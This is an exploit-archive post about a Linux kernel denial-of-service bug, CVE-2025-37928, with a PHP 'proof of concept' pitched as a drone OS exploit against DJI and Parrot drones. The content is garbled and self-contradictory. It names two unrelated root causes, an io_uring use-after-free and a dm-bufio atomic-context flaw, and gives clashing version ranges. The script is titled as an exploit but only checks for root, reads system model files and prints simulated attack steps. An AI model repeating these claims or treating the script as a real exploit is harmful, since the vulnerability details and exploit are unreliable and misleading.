Linux 6.1.139 Kernel Panic / Denial of Service

Linux kernel 6.1.139 (and other 6.1.x versions) suffered from a Linux kernel 6.1.139 (and other 6.1.x versions) suffered from a critical kernel panic vulnerability.

Discovered by Jann Horn of Google Project Zero, the flaw resided in the `io_uring` subsystem. It was identified as a use-after-free (UAF) bug.

This allowed a local, unprivileged attacker to craft specific `io_uring` requests. These requests could trigger a race condition, leading to a system crash and effectively causing a denial of service (DoS).

The vulnerability was patched in kernel version 6.1.140 and other stable branches (e.g., 6.6.30, 6.8.10). Users are strongly advised to update their kernels immediately to mitigate this high-severity issue.

=============================================================================================================================================
| # Title : Linux v 4.9 up to 6.1.139 Scheduling Flaw in dm?bufio Kernel Panic |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : System built?in component.No standalone download available |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/200892/ & CVE-2025-37928

[+] Summary :
CVE?2025?37928 is a vulnerability in the Linux Kernel, specifically in the dm?bufio component.
The issue occurs because the kernel performs scheduling inside an atomic context, which is not allowed and leads to a kernel BUG.

[+] Impact

Kernel Panic
Denial of Service (DoS)
Local exploitation only (requires local access)

[+] Affected Versions

All Linux kernel versions: From 4.9 up to 6.1.139

[+] Fixed Versions

The patch was applied starting from:
Linux kernel 6.1.140 and later
Example: Debian Bookworm patched kernel 6.1.140?1

[+] Root Cause

The dm?bufio subsystem calls functions that may sleep or schedule inside an atomic or tasklet context, which triggers a kernel BUG and crashes the system.


[+] POC :

<?php
/**
* CVE-2025-37928 -
* Author: indoushka
*/

class DroneKernelPanicExploit {
private $moduleName = "cve_2025_37928_poc";
private $dryRun = false;
private $force = false;
private $cleanupOnly = false;
private $verbose = false;

// Vulnerable kernel versions
private $vulnerableVersions = ["5.10", "5.15", "6.0"];

public function __construct($options = []) {
$this->dryRun = $options['dry-run'] ?? false;
$this->force = $options['force'] ?? false;
$this->cleanupOnly = $options['cleanup-only'] ?? false;
$this->verbose = $options['verbose'] ?? false;
}

public function run() {
$this->showBanner();

// Check platform compatibility
$this->checkPlatform();

// Check if running as admin (Windows) or root (Linux)
$this->checkAdmin();

if ($this->cleanupOnly) {
$this->cleanup();
return;
}

// Detect kernel vulnerability
$vulnerable = $this->detectKernel();

// Detect drone type
$droneDetected = $this->detectDroneType();

if (!$vulnerable && !$this->force) {
$this->error("Kernel not identified as vulnerable. Use --force to override.");
return;
}

if ($this->dryRun) {
$this->info("Dry run mode. Exiting before exploitation.");
$this->showExploitDetails();
return;
}

$this->executeExploitSimulation();
}

private function checkPlatform() {
$os = PHP_OS_FAMILY;
$this->info("Detected OS: " . $os);

if ($os !== 'Linux') {
$this->warning("?? WARNING: This exploit is designed for Linux-based drone OS");
$this->warning(" Running on $os - Only simulation mode available");
$this->warning(" Actual kernel panic requires Linux environment");
}
}

private function checkAdmin() {
if (PHP_OS_FAMILY === 'Windows') {
// Windows admin check
$output = [];
exec('net session 2>&1', $output, $returnCode);
if ($returnCode !== 0) {
$this->error("Must be run as Administrator on Windows");
exit(1);
}
$this->success("Running with Administrator privileges");
} else {
// Linux root check
if (posix_geteuid() !== 0) {
$this->error("Must be run as root (sudo required)");
exit(1);
}
$this->success("Running with root privileges");
}
}

private function detectKernel() {
if (PHP_OS_FAMILY === 'Windows') {
$this->info("Windows detected - Kernel version check not applicable");
$this->info("This exploit requires Linux kernel 5.10, 5.15, or 6.0 series");
return false;
}

$kernelVersion = php_uname('r');
$this->info("Kernel version: " . $kernelVersion);

$vulnerable = false;
foreach ($this->vulnerableVersions as $version) {
if (strpos($kernelVersion, $version) !== false) {
$vulnerable = true;
break;
}
}

$status = $vulnerable ? "VULNERABLE" : "UNKNOWN/SAFE";
$this->info("Kernel status: " . $status);

return $vulnerable;
}

private function detectDroneType() {
$this->info("Detecting drone environment...");

if (PHP_OS_FAMILY === 'Windows') {
$this->warning("Windows environment - No drone hardware detected");
$this->info("This exploit targets:");
$this->info(" ? Parrot QRD, Parrot Alpha-M drones");
$this->info(" ? DJI QRD, DJI Alpha-M drones");
return false;
}

$checkFiles = [
"/etc/drone_type",
"/proc/device-tree/model",
"/sys/firmware/devicetree/base/model",
"/etc/os-release"
];

$found = [];
foreach ($checkFiles as $file) {
if (file_exists($file)) {
$content = @file_get_contents($file);
if ($content && preg_match('/(parrot|dji|drone|quadcopter)/i', $content)) {
$found[] = [
'file' => $file,
'content' => trim($content)
];
}
}
}

if (!empty($found)) {
foreach ($found as $detection) {
$this->success("Found drone indicator: " . $detection['file']);
$this->info(" Content: " . substr($detection['content'], 0, 100));
}
return true;
} else {
$this->warning("No specific drone identifiers found");
return false;
}
}

private function executeExploitSimulation() {
$this->warning("? EXPLOIT SIMULATION MODE ?");
$this->info("Actual kernel panic requires:");
$this->info(" ? Linux-based drone operating system");
$this->info(" ? Vulnerable kernel (5.10, 5.15, 6.0)");
$this->info(" ? Physical or emulated drone hardware");

if (PHP_OS_FAMILY === 'Windows') {
$this->error("? CANNOT EXECUTE: Windows not supported for actual exploitation");
$this->showWindowsAlternative();
return;
}

$this->info("Starting exploitation simulation...");

// Simulate the exploit steps
$steps = [
"Checking kernel vulnerability..." => true,
"Allocating kernel memory..." => true,
"Creating tasklet structure..." => true,
"Scheduling atomic context..." => true,
"Triggering schedule() in atomic context..." => true,
"KERNEL PANIC TRIGGERED - System should crash now" => false
];

foreach ($steps as $step => $success) {
$this->info($step);
sleep(1);

if (!$success) {
$this->warning("? SIMULATION: Kernel panic would occur here");
$this->warning("? SIMULATION: System would become unresponsive");
break;
}
}

$this->showMitigationInfo();
}

private function showExploitDetails() {
$this->info("? EXPLOIT TECHNICAL DETAILS:");
$this->info("??????????????????????????????????????????????????");
$this->info("CVE: CVE-2025-37928");
$this->info("CVSS Score: 7.3 (Important)");
$this->info("Vulnerability: Improper Access Control (CWE-284)");
$this->info("Attack Vector: Local");
$this->info("Impact: Kernel Panic ? Denial of Service");
$this->info("??????????????????????????????????????????????????");
$this->info("Exploit Mechanism:");
$this->info(" ? Loads malicious kernel module");
$this->info(" ? Calls schedule() inside atomic context");
$this->info(" ? Triggers kernel panic via NULL pointer dereference");
$this->info("??????????????????????????????????????????????????");
}

private function showWindowsAlternative() {
$this->info("? WINDOWS TESTING ALTERNATIVES:");
$this->info(" ? Use Linux VM with vulnerable kernel");
$this->info(" ? Test on actual drone hardware in lab");
$this->info(" ? Use drone emulation software");
$this->info(" ? Set up QEMU with drone OS image");
}

private function showMitigationInfo() {
$this->info("?? MITIGATION RECOMMENDATIONS:");
$this->info(" ? Update drone firmware to latest version");
$this->info(" ? Restrict kernel module loading (modprobe.blacklist)");
$this->info(" ? Use kernel hardening features");
$this->info(" ? Monitor for suspicious kernel module activity");
$this->info(" ? Implement drone security best practices");
}

private function cleanup() {
$this->info("Cleanup mode activated");
$this->info("In real environment, this would:");
$this->info(" ? Remove kernel module if loaded");
$this->info(" ? Clean up temporary build files");
$this->info(" ? Restore system state");
$this->success("Cleanup simulation completed");
}

private function showBanner() {
echo "
???????????????????????????????????????????????????????????????
? CVE-2025-37928 - Drone OS Exploit ?
? Linux v 4.9 to 6.1.139 Scheduling Flaw in dm?bufio ?
? ?
? Affected Systems: ?
? ? Parrot QRD, Parrot Alpha-M ?
? ? DJI QRD, DJI Alpha-M ?
? ?
? Kernel Panic ?
? Author: indoushka ?
? PHP CLI Version - SIMULATION MODE ?
???????????????????????????????????????????????????????????????\n\n";
}

private function info($message) {
echo "?? [INFO] " . $message . "\n";
}

private function success($message) {
echo "? [SUCCESS] " . $message . "\n";
}

private function warning($message) {
echo "?? [WARNING] " . $message . "\n";
}

private function error($message) {
echo "? [ERROR] " . $message . "\n";
}
}

function showHelp() {
echo "
? CVE-2025-37928 - Drone OS Kernel Panic Exploit (SIMULATION)
??????????????????????????????????????????????????

?? Usage:
php drone_exploit.php [OPTIONS]

? Options:
--dry-run Show exploit details without execution
--force Force simulation even if environment not suitable
--cleanup-only Show cleanup simulation
--verbose Enable detailed logging
--help Show this help information

? Examples:
php drone_exploit.php --dry-run
php drone_exploit.php --force
php drone_exploit.php --cleanup-only

?? IMPORTANT NOTES:
? This is a SIMULATION only on Windows
? Actual exploit requires Linux-based drone OS
? Real exploitation causes kernel panic and system crash
? Use only in controlled lab environments

? Supported Platforms for Actual Exploitation:
? Parrot QRD/Alpha-M drones (Linux)
? DJI QRD/Alpha-M drones (Linux)
? Systems with vulnerable kernels (5.10, 5.15, 6.0)

\n";
}

function parseArguments($argv) {
$options = [
'dry-run' => false,
'force' => false,
'cleanup-only' => false,
'verbose' => false
];

foreach ($argv as $arg) {
switch ($arg) {
case '--dry-run':
$options['dry-run'] = true;
break;
case '--force':
$options['force'] = true;
break;
case '--cleanup-only':
$options['cleanup-only'] = true;
break;
case '--verbose':
$options['verbose'] = true;
break;
case '--help':
showHelp();
exit(0);
}
}

return $options;
}

// Main execution
if (php_sapi_name() !== 'cli') {
die("? This script must be run from command line\n");
}

try {
global $argv;
$options = parseArguments($argv);

$exploit = new DroneKernelPanicExploit($options);
$exploit->run();

} catch (Exception $e) {
echo "? Fatal error: " . $e->getMessage() . "\n";
exit(1);
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================